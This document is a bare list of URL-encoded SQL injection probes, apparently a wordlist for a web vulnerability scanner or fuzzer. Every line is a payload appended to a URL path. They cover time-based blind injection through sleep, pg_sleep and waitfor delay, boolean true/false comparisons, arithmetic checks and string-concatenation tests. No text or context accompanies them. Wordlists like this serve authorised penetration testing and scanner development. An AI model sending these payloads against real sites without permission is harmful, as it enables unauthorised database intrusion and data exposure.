/%22
/%22%20and%20pg_sleep(5)--
/%22%20and%20sleep(5)%23
/%22%20and%20sleep(5)%3d%22
/%22%20or%20pg_sleep(5)--
/%22%20or%20sleep(5)%23
/%22%20or%20sleep(5)%3d%22
/%22%3bwaitfor%20delay%20'0%3a0%3a5'--
/%22)%20and%20pg_sleep(5)--
/%22)%20and%20sleep(5)%3d%22
/%22)%20or%20pg_sleep(5)--
/%22)%20or%20sleep(5)%3d%22
/%22)%3bwaitfor%20delay%20'0%3a0%3a5'--
/%22))%20and%20pg_sleep(5)--
/%22))%20and%20sleep(5)%3d%22
/%22))%20or%20pg_sleep(5)--
/%22))%20or%20sleep(5)%3d%22
/%22))%3bwaitfor%20delay%20'0%3a0%3a5'--
/%3bwaitfor%20delay%20'0%3a0%3a5'--
/%c2%bf'"(
/'
/'%20and%20pg_sleep(5)--
/'%20and%20sleep(5)%23
/'%20and%20sleep(5)%3d'
/'%20or%20pg_sleep(5)--
/'%20or%20sleep(5)%23
/'%20or%20sleep(5)%3d'
/'%3bwaitfor%20delay%20'0%3a0%3a5'--
/')%20and%20pg_sleep(5)--
/')%20and%20sleep(5)%3d'
/')%20or%20pg_sleep(5)--
/')%20or%20sleep(5)%3d'
/')%3bwaitfor%20delay%20'0%3a0%3a5'--
/'))%20and%20pg_sleep(5)--
/'))%20and%20sleep(5)%3d'
/'))%20or%20pg_sleep(5)--
/'))%20or%20sleep(5)%3d'
/'))%3bwaitfor%20delay%20'0%3a0%3a5'--
/(
/)
/)%3bwaitfor%20delay%20'0%3a0%3a5'--
/))%3bwaitfor%20delay%20'0%3a0%3a5'--
/0-a
/0-b
/1%20and%20pg_sleep(5)--
/1%20and%20sleep(5)%23
/1%20or%20pg_sleep(5)--
/1%20or%20sleep(5)%23
/1%2b2
/1)%20and%20pg_sleep(5)--
/1)%20and%20sleep(5)%23
/1)%20or%20pg_sleep(5)--
/1)%20or%20sleep(5)%23
/1))%20and%20pg_sleep(5)--
/1))%20and%20sleep(5)%23
/1))%20or%20pg_sleep(5)--
/1))%20or%20sleep(5)%23
/1-1
/11-5
/12-6
/123
/2%2b1
/2%2b6
/2-2
/21%20or%205%3d8--
/21%20or%207%3d5--
/21%20or%207%3d7--
/21%20or%208%3d8--
/3%2b5
/3%2ba
/3%2bb
/pg_sleep(5)--
/should_not_xist_dddddddddd
/sleep(5)%23
/w%20'eb
/w%2b'eb
/w%7c%7c'eb
/w'%20'eb
/w'%2b'eb
/w'%7c%7c'eb
/web
/web%22%20and%20%22s%22%3d%22r
/web%22%20and%20%22s%22%3d%22s
/web%22%20and%20%22t%22%3d%22r
/web%22%20and%20%22t%22%3d%22t
/web%22%20and%205%3d8--
/web%22%20and%207%3d5--
/web%22%20and%207%3d7--
/web%22%20and%208%3d8--
/web'%20and%20's'%3d'r
/web'%20and%20's'%3d's
/web'%20and%20't'%3d'r
/web'%20and%20't'%3d't
/web'%20and%205%3d8--
/web'%20and%207%3d5--
/web'%20and%207%3d7--
/web'%20and%208%3d8--
/webxxx%22%20or%20%22s%22%3d%22r
/webxxx%22%20or%20%22s%22%3d%22s
/webxxx%22%20or%20%22t%22%3d%22r
/webxxx%22%20or%20%22t%22%3d%22t
/webxxx%22%20or%205%3d8--
/webxxx%22%20or%207%3d5--
/webxxx%22%20or%207%3d7--
/webxxx%22%20or%208%3d8--
/webxxx'%20or%20's'%3d'r
/webxxx'%20or%20's'%3d's
/webxxx'%20or%20't'%3d'r
/webxxx'%20or%20't'%3d't
/webxxx'%20or%205%3d8--
/webxxx'%20or%207%3d5--
/webxxx'%20or%207%3d7--
/webxxx'%20or%208%3d8--
